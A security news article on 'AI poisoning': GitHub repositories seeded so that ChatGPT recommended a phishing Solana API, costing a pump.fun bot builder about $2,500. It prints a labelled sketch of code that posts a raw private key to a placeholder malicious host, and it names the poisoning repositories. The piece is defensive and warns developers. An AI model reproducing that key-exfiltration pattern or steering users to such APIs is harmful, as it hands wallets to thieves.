"AI poisoning" is hard to prevent, can we still use ChatGPT to write code?
Recently, a user who was trying to build an automated bump bot for pump.fun (a bot that keeps a token pinned near the top of the site) asked ChatGPT for coding help and was led straight into a scam. Following the code ChatGPT provided, the user visited a recommended Solana API website. That site was in fact a phishing platform, and the user lost roughly $2,500.
By the user's own account, part of the code required submitting a private key through the API. Working in a hurry, he used his main Solana wallet without careful review. In hindsight he recognized this as a serious mistake, but at the time his trust in OpenAI led him to overlook the risk.
Once the API was called, the scammers acted fast: within 30 minutes they transferred all assets from the user's wallet to the address FdiBGKS8noGHY2fppnDgcgCQts95Ww8HSLUvWbzv1NhX. The user did not immediately realize the website was the problem, but after carefully examining the domain's homepage he found obvious red flags.
The user is now calling on the community and @solana to help block the malicious website, and on @OpenAI to remove the related information from its platform to prevent further victims. He also hopes the clues the perpetrators left behind can be investigated and the scammers brought to justice.
Scam Sniffer's investigation uncovered malicious code repositories whose purpose is to steal private keys via AI-generated code:
• solanaapisdev/moonshot-trading-bot
• solanaapisdev/pumpfun-api
The GitHub user "solanaapisdev" created multiple code repositories over the past four months, apparently in an attempt to steer AI models toward generating malicious code.
The user's private key was stolen because the code sent it directly to the phishing website in the body of an HTTP request.
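For illustration, the dangerous pattern looks roughly like the sketch below. The endpoint and field names are hypothetical placeholders, not copied from the actual malicious repositories; the red flag is the shape of the request itself, since any API that asks for a raw private key in the request body hands whoever runs the server full control of the wallet.

```typescript
// DANGEROUS PATTERN -- shown only so it can be recognized and avoided.
// The endpoint and field names below are hypothetical placeholders.
async function buyToken(privateKeyBase58: string, mint: string) {
  const res = await fetch("https://malicious-api.example/api/trade/buy", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      private_key: privateKeyBase58, // raw key leaves the machine here
      mint,                          // token mint address to buy
      amount: 0.1,                   // amount in SOL
    }),
  });
  return res.json(); // the server can now drain the wallet at will
}
```

Legitimate Solana tooling never needs the private key server-side: transactions are signed locally and only the signed bytes are transmitted.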
SlowMist founder Yu Xian (Cos) commented: "These are very unsafe practices, poisoning of all kinds. Not only do they have users upload private keys, they even generate private keys online for users to use, and the documentation is written to look quite legitimate."
He added that these malicious sites provide only minimal contact information and have almost no content beyond documentation and code repositories. "The domain was registered at the end of September, which does make it look like premeditated poisoning, but there is no evidence it was poisoned specifically to target GPT, or that GPT actively crawled it."
Scam Sniffer's security recommendations for AI-assisted coding:
• Do not blindly use AI-generated code
• Always review the code carefully before running it
• Store private keys in an offline environment and sign transactions locally (see the sketch after this list)
• Only use trusted sources
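As a concrete contrast to the dangerous pattern shown earlier, here is a minimal sketch of local signing with the official @solana/web3.js library. The KEYPAIR_PATH environment variable and the transfer logic are illustrative assumptions; the point is that the secret key is read from a local file and never appears in any request body, because signing happens on the user's own machine.

```typescript
import { readFileSync } from "fs";
import {
  Connection,
  Keypair,
  LAMPORTS_PER_SOL,
  PublicKey,
  SystemProgram,
  Transaction,
  sendAndConfirmTransaction,
} from "@solana/web3.js";

// Load a keypair produced by `solana-keygen` from a local file.
// KEYPAIR_PATH is an illustrative placeholder; keep the file out of
// the repository and off any server you do not control.
const secret = Uint8Array.from(
  JSON.parse(readFileSync(process.env.KEYPAIR_PATH!, "utf8"))
);
const payer = Keypair.fromSecretKey(secret);

const connection = new Connection("https://api.mainnet-beta.solana.com");

async function sendSol(to: PublicKey, sol: number): Promise<string> {
  const tx = new Transaction().add(
    SystemProgram.transfer({
      fromPubkey: payer.publicKey,
      toPubkey: to,
      lamports: Math.round(sol * LAMPORTS_PER_SOL),
    })
  );
  // Signing happens locally; only the signed transaction is sent to
  // the RPC node. The private key itself never goes over the wire.
  return sendAndConfirmTransaction(connection, tx, [payer]);
}
```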